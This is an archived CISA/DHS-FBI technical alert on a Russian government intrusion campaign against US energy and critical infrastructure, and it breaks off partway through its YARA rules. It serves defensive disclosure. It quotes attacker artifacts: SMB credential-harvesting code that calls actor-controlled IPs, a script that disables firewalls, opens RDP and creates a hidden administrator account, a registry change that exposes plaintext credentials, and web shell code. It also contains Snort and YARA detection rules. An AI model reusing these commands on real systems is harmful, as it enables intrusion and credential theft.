{ "id": "a8e1cff2-0621-4695-ade6-c69df118f531", "created_at": "2026-04-06T00:20:19.825933Z", "updated_at": "2026-04-10T03:36:24.696552Z", "deleted_at": null, "sha1_hash": "08b57e20c50b48753f3f067341d566a8a7b90304", "title": "Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors | CISA", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 125973, "plain_text": "Russian Government Cyber Activity Targeting Energy and Other\r\nCritical Infrastructure Sectors | CISA\r\nPublished: 2018-03-16 · Archived: 2026-04-05 21:46:49 UTC\r\nSystems Affected\r\nDomain Controllers\r\nFile Servers\r\nEmail Servers\r\nOverview\r\nThis joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the\r\nFederal Bureau of Investigation (FBI). This alert provides information on Russian government actions targeting U.S.\r\nGovernment entities as well as organizations in the energy, nuclear, commercial facilities, water, aviation, and critical\r\nmanufacturing sectors. It also contains indicators of compromise (IOCs) and technical details on the tactics, techniques, and\r\nprocedures (TTPs) used by Russian government cyber actors on compromised victim networks. DHS and FBI produced this\r\nalert to educate network defenders to enhance their ability to identify and reduce exposure to malicious activity.\r\nDHS and FBI characterize this activity as a multi-stage intrusion campaign by Russian government cyber actors who\r\ntargeted small commercial facilities’ networks where they staged malware, conducted spear phishing, and gained remote\r\naccess into energy sector networks. After obtaining access, the Russian government cyber actors conducted network\r\nreconnaissance, moved laterally, and collected information pertaining to Industrial Control Systems (ICS).\r\nThe following IOC packages and associated files are no longer available for download:\r\nTA18-074A_TLP_WHITE.csv\r\nTA18-074A_TLP_WHITE.stix.xml\r\nMIFR-10127623_TLP_WHITE.pdf\r\nMIFR-10127623_TLP_WHITE_stix.xml\r\nMIFR-10128327_TLP_WHITE.pdf\r\nMIFR-10128327_TLP_WHITE_stix.xml\r\nMIFR-10128336_TLP_WHITE.pdf\r\nMIFR-10128336_TLP_WHITE_stix.xml\r\nMIFR-10128830_TLP_WHITE.pdf\r\nMIFR-10128830_TLP_WHITE_stix.xml\r\nMIFR-10128883_TLP_WHITE.pdf\r\nMIFR-10128883_TLP_WHITE_stix.xml\r\nMIFR-10135300_TLP_WHITE.pdf\r\nMIFR-10135300_TLP_WHITE_stix.xml\r\nContact DHS or law enforcement immediately to report an intrusion and to request incident response resources or technical\r\nassistance.\r\nSince at least March 2016, Russian government cyber actors—hereafter referred to as “threat actors”—targeted government\r\nentities and multiple U.S. critical infrastructure sectors, including the energy, nuclear, commercial facilities, water, aviation,\r\nand critical manufacturing sectors.\r\nAnalysis by DHS and FBI, resulted in the identification of distinct indicators and behaviors related to this activity. Of note,\r\nthe report Dragonfly: Western energy sector targeted by sophisticated attack group, released by Symantec on September 6,\r\n2017, provides additional information about this ongoing campaign. [1]\r\nThis campaign comprises two distinct categories of victims: staging and intended targets. The initial victims are peripheral\r\norganizations such as trusted third-party suppliers with less secure networks, referred to as “staging targets” throughout this\r\nalert. The threat actors used the staging targets’ networks as pivot points and malware repositories when targeting their final\r\nintended victims. NCCIC and FBI judge the ultimate objective of the actors is to compromise organizational networks, also\r\nreferred to as the “intended target.”\r\nTechnical Details\r\nThe threat actors in this campaign employed a variety of TTPs, including\r\nhttps://www.cisa.gov/news-events/alerts/2018/03/15/russian-government-cyber-activity-targeting-energy-and-other-critical-infrastructure-sectors\r\nPage 1 of 15\n\nspear-phishing emails (from compromised legitimate account),\nwatering-hole domains,\ncredential gathering,\nopen-source and network reconnaissance,\nhost-based exploitation, and\ntargeting industrial control system (ICS) infrastructure.\nUsing Cyber Kill Chain for Analysis\nDHS used the Lockheed-Martin Cyber Kill Chain model to analyze, discuss, and dissect malicious cyber activity. Phases of\nthe model include reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on\nthe objective. This section will provide a high-level overview of threat actors’ activities within this framework.\nStage 1: Reconnaissance\nThe threat actors appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of\nopportunity. Staging targets held preexisting relationships with many of the intended targets. DHS analysis identified the\nthreat actors accessing publicly available information hosted by organization-monitored networks during the reconnaissance\nphase. Based on forensic analysis, DHS assesses the threat actors sought information on network and organizational design\nand control system capabilities within organizations. These tactics are commonly used to collect the information needed for\ntargeted spear-phishing attempts. In some cases, information posted to company websites, especially information that may\nappear to be innocuous, may contain operationally sensitive information. As an example, the threat actors downloaded a\nsmall photo from a publicly accessible human resources page. The image, when expanded, was a high-resolution photo that\ndisplayed control systems equipment models and status information in the background.\nAnalysis also revealed that the threat actors used compromised staging targets to download the source code for several\nintended targets’ websites. Additionally, the threat actors attempted to remotely access infrastructure such as corporate web-based email and virtual private network (VPN) connections.\nStage 2: Weaponization\nSpear-Phishing Email TTPs\nThroughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office\nfunctions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. (An example of\nthis request is: file[:]///Normal.dotm). As a part of the standard processes executed by Microsoft Word,\nthis request authenticates the client with the server, sending the user’s credential hash to the remote server before retrieving\nthe requested file. (Note: transfer of credentials can occur even if the file is not retrieved.) After obtaining a credential hash,\nthe threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat\nactors are able to masquerade as authorized users in environments that use single-factor authentication. [2]\nUse of Watering Hole Domains\nOne of the threat actors’ primary uses for staging targets was to develop watering holes. Threat actors compromised the\ninfrastructure of trusted organizations to reach intended targets. [3] Approximately half of the known watering holes are\ntrade publications and informational websites related to process control, ICS, or critical infrastructure. Although these\nwatering holes may host legitimate content developed by reputable organizations, the threat actors altered websites to\ncontain and reference malicious content. The threat actors used legitimate credentials to access and directly modify the\nwebsite content. The threat actors modified these websites by altering JavaScript and PHP files to request a file icon using\nSMB from an IP address controlled by the threat actors. This request accomplishes a similar technique observed in the spear-phishing documents for credential harvesting. In one instance, the threat actors added a line of code into the file\n“header.php”, a legitimate PHP file that carried out the redirected traffic.\n![](file[:]//62.8.193[.]206/main_logo.png) In another instance, the threat actors modified the JavaScript file, “modernizr.js”, a legitimate JavaScript library used by the\nwebsite to detect various aspects of the user’s browser. The file was modified to contain the contents below:\nvar i = document.createElement(\"img\");\ni.src = \"file[:]//184.154.150[.]66/ame_icon.png\";\ni.width = 3;\ni.height=2;\nhttps://www.cisa.gov/news-events/alerts/2018/03/15/russian-government-cyber-activity-targeting-energy-and-other-critical-infrastructure-sectors\nPage 2 of 15\n\nStage 3: Delivery\r\nWhen compromising staging target networks, the threat actors used spear-phishing emails that differed from previously\r\nreported TTPs. The spear-phishing emails used a generic contract agreement theme (with the subject line “AGREEMENT \u0026\r\nConfidential”) and contained a generic PDF document titled ``document.pdf. (Note the inclusion of two single back ticks at\r\nthe beginning of the attachment name.) The PDF was not malicious and did not contain any active code. The document\r\ncontained a shortened URL that, when clicked, led users to a website that prompted the user for email address and password.\r\n(Note: no code within the PDF initiated a download.)\r\nIn previous reporting, DHS and FBI noted that all of these spear-phishing emails referred to control systems or process\r\ncontrol systems. The threat actors continued using these themes specifically against intended target organizations. Email\r\nmessages included references to common industrial control equipment and protocols. The emails used malicious Microsoft\r\nWord attachments that appeared to be legitimate résumés or curricula vitae (CVs) for industrial control systems personnel,\r\nand invitations and policy documents to entice the user to open the attachment.\r\nStage 4: Exploitation\r\nThe threat actors used distinct and unusual TTPs in the phishing campaign directed at staging targets. Emails contained\r\nsuccessive redirects to http://bit[.]ly/2m0x8IH link, which redirected to http://tinyurl[.]com/h3sdqck link, which redirected\r\nto the ultimate destination of http://imageliners[.]com/nitel. The imageliner[.]com website contained input fields for an email\r\naddress and password mimicking a login page for a website.\r\nWhen exploiting the intended targets, the threat actors used malicious .docx files to capture user credentials. The documents\r\nretrieved a file through a “file://” connection over SMB using Transmission Control Protocol (TCP) ports 445 or 139. This\r\nconnection is made to a command and control (C2) server—either a server owned by the threat actors or that of a victim.\r\nWhen a user attempted to authenticate to the domain, the C2 server was provided with the hash of the password. Local users\r\nreceived a graphical user interface (GUI) prompt to enter a username and password, and the C2 received this information\r\nover TCP ports 445 or 139. (Note: a file transfer is not necessary for a loss of credential information.) Symantec’s report\r\nassociates this behavior to the Dragonfly threat actors in this campaign. [1]\r\nStage 5: Installation\r\nThe threat actors leveraged compromised credentials to access victims’ networks where multi-factor authentication was not\r\nused. [4] To maintain persistence, the threat actors created local administrator accounts within staging targets and placed\r\nmalicious files within intended targets.\r\nEstablishing Local Accounts\r\nThe threat actors used scripts to create local administrator accounts disguised as legitimate backup accounts. The initial\r\nscript “symantec_help.jsp” contained a one-line reference to a malicious script designed to create the local administrator\r\naccount and manipulate the firewall for remote access. The script was located in “C:\\Program Files\r\n(x86)\\Symantec\\Symantec Endpoint Protection Manager\\tomcat\\webapps\\ROOT\\”.\r\nContents of symantec_help.jsp\r\n____________________________________________________________________________________________________________________\r\n\u003c% Runtime.getRuntime().exec(\"cmd /C \\\"\" + System.getProperty(\"user.dir\") + \"\\\\..\\\\webapps\\\\ROOT\\\\\u003cenu.cmd\u003e\\\"\"); %\u003e\r\n____________________________________________________________________________________________________________________\r\nThe script “enu.cmd” created an administrator account, disabled the host-based firewall, and globally opened port 3389 for\r\nRemote Desktop Protocol (RDP) access. The script then attempted to add the newly created account to the administrators\r\ngroup to gain elevated privileges. This script contained hard-coded values for the group name “administrator” in Spanish,\r\nItalian, German, French, and English.\r\nContents of enu.cmd\r\n____________________________________________________________________________________________________________________\r\nnetsh firewall set opmode disable\r\nnetsh advfirewall set allprofiles state off\r\nreg add\r\n\"HKLM\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\GloballyOpenPorts\\List\"\r\n/v 3389:TCP /t REG_SZ /d \"3389:TCP:*:Enabled:Remote Desktop\" /f\r\nhttps://www.cisa.gov/news-events/alerts/2018/03/15/russian-government-cyber-activity-targeting-energy-and-other-critical-infrastructure-sectors\r\nPage 3 of 15\n\nreg add\r\n\"HKLM\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\DomainProfile\\GloballyOpenPorts\\List\"\r\n/v 3389:TCP /t REG_SZ /d \"3389:TCP:*:Enabled:Remote Desktop\" /f\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Licensing Core\" /v EnableConcurrentSessions /t\r\nREG_DWORD /d 1 /f\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v EnableConcurrentSessions /t\r\nREG_DWORD /d 1 /f\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v AllowMultipleTSSessions /t\r\nREG_DWORD /d 1 /f\r\nreg add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\" /v MaxInstanceCount /t REG_DWORD\r\n/d 100 /f\r\nnet user MS_BACKUP \u003cRedacted_Password\u003e /add\r\nnet localgroup Administrators /add MS_BACKUP\r\nnet localgroup Administradores /add MS_BACKUP\r\nnet localgroup Amministratori /add MS_BACKUP\r\nnet localgroup Administratoren /add MS_BACKUP\r\nnet localgroup Administrateurs /add MS_BACKUP\r\nnet localgroup \"Remote Desktop Users\" /add MS_BACKUP\r\nnet user MS_BACKUP /expires:never\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" /v\r\nMS_BACKUP /t REG_DWORD /d 0 /f\r\nreg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system /v dontdisplaylastusername /t\r\nREG_DWORD /d 1 /f\r\nreg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system /v LocalAccountTokenFilterPolicy /t\r\nREG_DWORD /d 1 /f\r\nsc config termservice start= auto\r\nnet start termservice\r\n____________________________________________________________________________________________________________________\r\nDHS observed the threat actors using this and similar scripts to create multiple accounts within staging target networks.\r\nEach account created by the threat actors served a specific purpose in their operation. These purposes ranged from the\r\ncreation of additional accounts to cleanup of activity. DHS and FBI observed the following actions taken after the creation\r\nof these local accounts:\r\nAccount 1: Account 1 was named to mimic backup services of the staging target. This account was created by the malicious\r\nscript described earlier. The threat actor used this account to conduct open-source reconnaissance and remotely access\r\nintended targets.\r\nAccount 2: Account 1 was used to create Account 2 to impersonate an email administration account. The only observed\r\naction was to create Account 3.\r\nAccount 3: Account 3 was created within the staging victim’s Microsoft Exchange Server. A PowerShell script created this\r\naccount during an RDP session while the threat actor was authenticated as Account 2. The naming conventions of the\r\ncreated Microsoft Exchange account followed that of the staging target (e.g., first initial concatenated with the last name).\r\nAccount 4: In the latter stage of the compromise, the threat actor used Account 1 to create Account 4, a local administrator\r\naccount. Account 4 was then used to delete logs and cover tracks.\r\nhttps://www.cisa.gov/news-events/alerts/2018/03/15/russian-government-cyber-activity-targeting-energy-and-other-critical-infrastructure-sectors\r\nPage 4 of 15\n\nScheduled Task\r\nIn addition, the threat actors created a scheduled task named reset, which was designed to automatically log out of their\r\nnewly created account every eight hours.\r\nVPN Software\r\nAfter achieving access to staging targets, the threat actors installed tools to carry out operations against intended victims. On\r\none occasion, threat actors installed the free version of FortiClient, which they presumably used as a VPN client to connect\r\nto intended target networks.\r\nPassword Cracking Tools\r\nConsistent with the perceived goal of credential harvesting, the threat actors dropped and executed open source and free\r\ntools such as Hydra, SecretsDump, and CrackMapExec. The naming convention and download locations suggest that these\r\nfiles were downloaded directly from publically available locations such as GitHub. Forensic analysis indicates that many of\r\nthese tools were executed during the timeframe in which the actor was accessing the system. Of note, the threat actors\r\ninstalled Python 2.7 on a compromised host of one staging victim, and a Python script was seen at C:\\Users\\\u003cRedacted\r\nUsername\u003e\\Desktop\\OWAExchange\\.\r\nDownloader\r\nOnce inside of an intended target’s network, the threat actor downloaded tools from a remote server. The initial versions of\r\nthe file names contained .txt extensions and were renamed to the appropriate extension, typically .exe or .zip.\r\nIn one example, after gaining remote access to the network of an intended victim, the threat actor carried out the following\r\nactions:\r\nThe threat actor connected to 91.183.104[.]150 and downloaded multiple files, specifically the file INST.txt.\r\nThe files were renamed to new extensions, with INST.txt being renamed INST.exe.\r\nThe files were executed on the host and then immediately deleted.\r\nThe execution of INST.exe triggered a download of ntdll.exe, and shortly after, ntdll.exe appeared in the running\r\nprocess list of the compromised system of an intended target.\r\nThe registry value “ntdll” was added to the “HKEY_USERS\\\u003cUSER\r\nSID\u003e\\Software\\Microsoft\\Windows\\CurrentVersion\\Run” key.\r\nPersistence Through .LNK File Manipulation\r\nThe threat actors manipulated LNK files, commonly known as a Microsoft Window’s shortcut file, to repeatedly gather user\r\ncredentials. Default Windows functionality enables icons to be loaded from a local or remote Windows repository. The threat\r\nactors exploited this built-in Windows functionality by setting the icon path to a remote server controller by the actors.\r\nWhen the user browses to the directory, Windows attempts to load the icon and initiate an SMB authentication session.\r\nDuring this process, the active user’s credentials are passed through the attempted SMB connection.\r\nFour of the observed LNK files were “SETROUTE.lnk”, “notepad.exe.lnk”, “Document.lnk” and “desktop.ini.lnk”. These\r\nnames appeared to be contextual, and the threat actor may use a variety of other file names while using this tactic. Two of\r\nthe remote servers observed in the icon path of these LNK files were 62.8.193[.]206 and 5.153.58[.]45. Below is the parsed\r\ncontent of one of the LNK files:\r\nParsed output for file: desktop.ini.lnk\r\nRegistry Modification\r\nThe threat actor would modify key systems to store plaintext credentials in memory. In one instance, the threat actor\r\nexecuted the following command.\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\" /v UseLogonCredential /t\r\nREG_DWORD /d 1 /f\r\nStage 6: Command and Control\r\nThe threat actors commonly created web shells on the intended targets’ publicly accessible email and web servers. The threat\r\nactors used three different filenames (“global.aspx, autodiscover.aspx and index.aspx) for two different webshells. The\r\ndifference between the two groups was the “public string Password” field.\r\nBeginning Contents of the Web Shell\r\nhttps://www.cisa.gov/news-events/alerts/2018/03/15/russian-government-cyber-activity-targeting-energy-and-other-critical-infrastructure-sectors\r\nPage 5 of 15\n\n____________________________________________________________________________________________________________________\r\n\u003c%@ Page Language=\"C#\" Debug=\"true\" trace=\"false\" validateRequest=\"false\" EnableViewStateMac=\"false\"\r\nEnableViewState=\"true\"%\u003e\r\n\u003c%@ import Namespace=\"System\"%\u003e\r\n\u003c%@ import Namespace=\"System.IO\"%\u003e\r\n\u003c%@ import Namespace=\"System.Diagnostics\"%\u003e\r\n\u003c%@ import Namespace=\"System.Data\"%\u003e\r\n\u003c%@ import Namespace=\"System.Management\"%\u003e\r\n\u003c%@ import Namespace=\"System.Data.OleDb\"%\u003e\r\n\u003c%@ import Namespace=\"Microsoft.Win32\"%\u003e\r\n\u003c%@ import Namespace=\"System.Net.Sockets\" %\u003e\r\n\u003c%@ import Namespace=\"System.Net\" %\u003e\r\n\u003c%@ import Namespace=\"System.Runtime.InteropServices\"%\u003e\r\n\u003c%@ import Namespace=\"System.DirectoryServices\"%\u003e\r\n\u003c%@ import Namespace=\"System.ServiceProcess\"%\u003e\r\n\u003c%@ import Namespace=\"System.Text.RegularExpressions\"%\u003e\r\n\u003c%@ Import Namespace=\"System.Threading\"%\u003e\r\n\u003c%@ Import Namespace=\"System.Data.SqlClient\"%\u003e\r\n\u003c%@ import Namespace=\"Microsoft.VisualBasic\"%\u003e\r\n\u003c%@ Import Namespace=\"System.IO.Compression\" %\u003e\r\n\u003c%@ Assembly\r\nName=\"System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A\"%\u003e\r\n\u003c%@ Assembly\r\nName=\"System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A\"%\u003e\r\n\u003c%@ Assembly\r\nName=\"System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A\"%\u003e\r\n\u003c%@ Assembly\r\nName=\"Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a\"%\u003e\r\n\u003c!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-\r\ntransitional.dtd\"\u003e\r\n\u003cscript runat = \"server\"\u003e\r\npublic string Password = \"\u003cREDACTED\u003e\";\r\npublic string z_progname = \"z_WebShell\";\r\n…\r\n____________________________________________________________________________________________________________________\r\nStage 7: Actions on Objectives\r\nDHS and FBI identified the threat actors leveraging remote access services and infrastructure such as VPN, RDP, and\r\nOutlook Web Access (OWA). The threat actors used the infrastructure of staging targets to connect to several intended\r\ntargets.\r\nInternal Reconnaissance\r\nhttps://www.cisa.gov/news-events/alerts/2018/03/15/russian-government-cyber-activity-targeting-energy-and-other-critical-infrastructure-sectors\r\nPage 6 of 15\n\nUpon gaining access to intended victims, the threat actors conducted reconnaissance operations within the network. DHS\r\nobserved the threat actors focusing on identifying and browsing file servers within the intended victim’s network.\r\nOnce on the intended target’s network, the threat actors used privileged credentials to access the victim’s domain controller\r\ntypically via RDP. Once on the domain controller, the threat actors used the batch scripts “dc.bat” and “dit.bat” to enumerate\r\nhosts, users, and additional information about the environment. The observed outputs (text documents) from these scripts\r\nwere:\r\nadmins.txt\r\ncompleted_dclist.txt\r\ncompleted_trusts.txt\r\ncompleted_zone.txt\r\ncomps.txt\r\nconditional_forwarders.txt\r\ndomain_zone.txt\r\nenum_zones.txt\r\nusers.txt\r\nThe threat actors also collected the files “ntds.dit” and the “SYSTEM” registry hive. DHS observed the threat actors\r\ncompress all of these files into archives named “SYSTEM.zip” and “comps.zip”.\r\nThe threat actors used Windows’ scheduled task and batch scripts to execute “scr.exe” and collect additional information\r\nfrom hosts on the network. The tool “scr.exe” is a screenshot utility that the threat actor used to capture the screen of\r\nsystems across the network. The MD5 hash of “scr.exe” matched the MD5 of ScreenUtil, as reported in the Symantec\r\nDragonfly 2.0 report.\r\nIn at least two instances, the threat actors used batch scripts labeled “pss.bat” and “psc.bat” to run the PsExec tool.\r\nAdditionally, the threat actors would rename the tool PsExec to “ps.exe”.\r\n1. The batch script (“pss.bat” or “psc.bat”) is executed with domain administrator credentials.\r\n2. The directory “out” is created in the user’s %AppData% folder.\r\n3. PsExec is used to execute “scr.exe” across the network and to collect screenshots of systems in “ip.txt”.\r\n4. The screenshot’s filename is labeled based on the computer name of the host and stored in the target’s\r\nC:\\Windows\\Temp directory with a “.jpg” extension.\r\n5. The screenshot is then copied over to the newly created “out” directory of the system where the batch script was\r\nexecuted.\r\n6. In one instance, DHS observed an “out.zip” file created.\r\nDHS observed the threat actors create and modify a text document labeled “ip.txt” which is believed to have contained a list\r\nof host information. The threat actors used “ip.txt” as a source of hosts to perform additional reconnaissance efforts. In\r\naddition, the text documents “res.txt” and “err.txt” were observed being created as a result of the batch scripts being\r\nexecuted. In one instance, “res.txt” contained output from the Windows’ command “query user” across the network.\r\nUsing \u003cUsername\u003e \u003cPassword\u003e\r\nRunning -s cmd /c query user on \u003cHostname1\u003e\r\nRunning -s cmd /c query user on \u003cHostname2\u003e\r\nRunning -s cmd /c query user on \u003cHostname3\u003e\r\nUSERNAME     SESSIONNAME       ID    STATE    IDLE TIME      LOGON TIME\r\n\u003cuser1\u003e                                              2       Disc       1+19:34         6/27/2017 12:35 PM\r\nAn additional batch script named “dirsb.bat” was used to gather folder and file names from hosts on the network.\r\nIn addition to the batch scripts, the threat actors also used scheduled tasks to collect screenshots with “scr.exe”. In two\r\ninstances, the scheduled tasks were designed to run the command “C:\\Windows\\Temp\\scr.exe” with the argument\r\n“C:\\Windows\\Temp\\scr.jpg”. In another instance, the scheduled task was designed to run with the argument “pss.bat” from\r\nthe local administrator’s “AppData\\Local\\Microsoft\\” folder.\r\nThe threat actors commonly executed files out of various directories within the user’s AppData or Downloads folder. Some\r\ncommon directory names were\r\nChromex64,\r\nMicrosoft_Corporation,\r\nNT,\r\nOffice365,\r\nhttps://www.cisa.gov/news-events/alerts/2018/03/15/russian-government-cyber-activity-targeting-energy-and-other-critical-infrastructure-sectors\r\nPage 7 of 15\n\nTemp, and\r\nUpdate.\r\nTargeting of ICS and SCADA Infrastructure\r\nIn multiple instances, the threat actors accessed workstations and servers on a corporate network that contained data output\r\nfrom control systems within energy generation facilities. The threat actors accessed files pertaining to ICS or supervisory\r\ncontrol and data acquisition (SCADA) systems. Based on DHS analysis of existing compromises, these files were named\r\ncontaining ICS vendor names and ICS reference documents pertaining to the organization (e.g., “SCADA WIRING\r\nDIAGRAM.pdf” or “SCADA PANEL LAYOUTS.xlsx”).\r\nThe threat actors targeted and copied profile and configuration information for accessing ICS systems on the network. DHS\r\nobserved the threat actors copying Virtual Network Connection (VNC) profiles that contained configuration information on\r\naccessing ICS systems. DHS was able to reconstruct screenshot fragments of a Human Machine Interface (HMI) that the\r\nthreat actors accessed.\r\nCleanup and Cover Tracks\r\nIn multiple instances, the threat actors created new accounts on the staging targets to perform cleanup operations. The\r\naccounts created were used to clear the following Windows event logs: System, Security, Terminal Services, Remote\r\nServices, and Audit. The threat actors also removed applications they installed while they were in the network along with\r\nany logs produced. For example, the Fortinet client installed at one commercial facility was deleted along with the logs that\r\nwere produced from its use. Finally, data generated by other accounts used on the systems accessed were deleted.\r\nThreat actors cleaned up intended target networks through deleting created screenshots and specific registry keys. Through\r\nforensic analysis, DHS determined that the threat actors deleted the registry key associated with terminal server client that\r\ntracks connections made to remote systems. The threat actors also deleted all batch scripts, output text documents and any\r\ntools they brought into the environment such as “scr.exe”.\r\nDetection and Response\r\nIOCs related to this campaign are provided within the accompanying .csv and .stix files of this alert. DHS and FBI\r\nrecommend that network administrators review the IP addresses, domain names, file hashes, network signatures, and YARA\r\nrules provided, and add the IPs to their watchlists to determine whether malicious activity has been observed within their\r\norganization. System owners are also advised to run the YARA tool on any system suspected to have been targeted by these\r\nthreat actors.\r\nNetwork Signatures and Host-Based Rules\r\nThis section contains network signatures and host-based rules that can be used to detect malicious activity associated with\r\nthreat actor TTPs. Although these network signatures and host-based rules were created using a comprehensive vetting\r\nprocess, the possibility of false positives always remains.\r\nNetwork Signatures\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET $HTTP_PORTS (msg:\"HTTP URI contains\r\n'/aspnet_client/system_web/4_0_30319/update/' (Beacon)\"; sid:42000000; rev:1; flow:established,to_server;\r\ncontent:\"/aspnet_client/system_web/4_0_30319/update/\"; http_uri; fast_pattern:only; classtype:bad-unknown;\r\nmetadata:service http;)\r\n___________________________________\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET $HTTP_PORTS (msg:\"HTTP URI contains '/img/bson021.dat'\";\r\nsid:42000001; rev:1; flow:established,to_server; content:\"/img/bson021.dat\"; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)\r\n________________________________________\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET $HTTP_PORTS (msg:\"HTTP URI contains '/A56WY' (Callback)\";\r\nsid:42000002; rev:1; flow:established,to_server; content:\"/A56WY\"; http_uri; fast_pattern; classtype:bad-unknown;\r\nmetadata:service http;)\r\n_________________________________________\r\nalert tcp any any -\u003e any 445 (msg:\"SMB Client Request contains 'AME_ICON.PNG' (SMB credential harvesting)\";\r\nsid:42000003; rev:1; flow:established,to_server; content:\"|FF|SMB|75 00 00 00 00|\"; offset:4; depth:9; content:\"|08 00 01\r\nhttps://www.cisa.gov/news-events/alerts/2018/03/15/russian-government-cyber-activity-targeting-energy-and-other-critical-infrastructure-sectors\r\nPage 8 of 15\n\n00|\"; distance:3; content:\"|00 5c 5c|\"; distance:2; within:3; content:\"|5c|AME_ICON.PNG\"; distance:7; fast_pattern;\r\nclasstype:bad-unknown; metadata:service netbios-ssn;)\r\n________________________________________\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET $HTTP_PORTS (msg:\"HTTP URI OPTIONS contains '/ame_icon.png'\r\n(SMB credential harvesting)\"; sid:42000004; rev:1; flow:established,to_server; content:\"/ame_icon.png\"; http_uri;\r\nfast_pattern:only; content:\"OPTIONS\"; nocase; http_method; classtype:bad-unknown; metadata:service http;)\r\n_________________________________________\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET $HTTP_PORTS (msg:\"HTTP Client Header contains 'User-Agent|3a\r\n20|Go-http-client/1.1'\"; sid:42000005; rev:1; flow:established,to_server; content:\"User-Agent|3a 20|Go-http-client/1.1|0d\r\n0a|Accept-Encoding|3a 20|gzip\"; http_header; fast_pattern:only; pcre:\"/\\.(?:aspx|txt)\\?[a-z0-9]{3}=[a-z0-9]{32}\u0026/U\";\r\nclasstype:bad-unknown; metadata:service http;)\r\n__________________________________________\r\nalert tcp $EXTERNAL_NET [139,445] -\u003e $HOME_NET any (msg:\"SMB Server Traffic contains NTLM-Authenticated\r\nSMBv1 Session\"; sid:42000006; rev:1; flow:established,to_client; content:\"|ff 53 4d 42 72 00 00 00 00 80|\";\r\nfast_pattern:only; content:\"|05 00|\"; distance:23; classtype:bad-unknown; metadata:service netbios-ssn;)\r\n \r\nYARA Rules\r\nThis is a consolidated rule set for malware associated with this activity. These rules were written by NCCIC and include\r\ncontributions from trusted partners.\r\n*/\r\nrule APT_malware_1\r\n{\r\nmeta:\r\n            description = \"inveigh pen testing tools \u0026 related artifacts\"\r\n            author = \"DHS | NCCIC Code Analysis Team\"    \r\n            date = \"2017/07/17\"\r\n            hash0 = \"61C909D2F625223DB2FB858BBDF42A76\"\r\n            hash1 = \"A07AA521E7CAFB360294E56969EDA5D6\"\r\n            hash2 = \"BA756DD64C1147515BA2298B6A760260\"\r\n            hash3 = \"8943E71A8C73B5E343AA9D2E19002373\"\r\n            hash4 = \"04738CA02F59A5CD394998A99FCD9613\"\r\n            hash5 = \"038A97B4E2F37F34B255F0643E49FC9D\"\r\n            hash6 = \"65A1A73253F04354886F375B59550B46\"\r\n            hash7 = \"AA905A3508D9309A93AD5C0EC26EBC9B\"\r\n            hash8 = \"5DBEF7BDDAF50624E840CCBCE2816594\"\r\n            hash9 = \"722154A36F32BA10E98020A8AD758A7A\"\r\n            hash10 = \"4595DBE00A538DF127E0079294C87DA0\"\r\nstrings:\r\n            $s0 = \"file://\"\r\n            $s1 = \"/ame_icon.png\"\r\n            $s2 = \"184.154.150.66\"\r\nhttps://www.cisa.gov/news-events/alerts/2018/03/15/russian-government-cyber-activity-targeting-energy-and-other-critical-infrastructure-sectors\r\nPage 9 of 15\n\n$s3 = { 87D081F60C67F5086A003315D49A4000F7D6E8EB12000081F7F01BDD21F7DE }\r\n            $s4 = { 33C42BCB333DC0AD400043C1C61A33C3F7DE33F042C705B5AC400026AF2102 }\r\n            $s5 = \"(g.charCodeAt(c)^l[(l[b]+l[e])%256])\"\r\n            $s6 = \"for(b=0;256\u003eb;b++)k[b]=b;for(b=0;256\u003eb;b++)\"\r\n            $s7 = \"VXNESWJfSjY3grKEkEkRuZeSvkE=\"\r\n            $s8 = \"NlZzSZk=\"\r\n            $s9 = \"WlJTb1q5kaxqZaRnser3sw==\"\r\n            $s10 = \"for(b=0;256\u003eb;b++)k[b]=b;for(b=0;256\u003eb;b++)\"\r\n            $s11 = \"fromCharCode(d.charCodeAt(e)^k[(k[b]+k[h])%256])\"\r\n            $s12 = \"ps.exe -accepteula \\\\%ws% -u %user% -p %pass% -s cmd /c netstat\"\r\n            $s13 = { 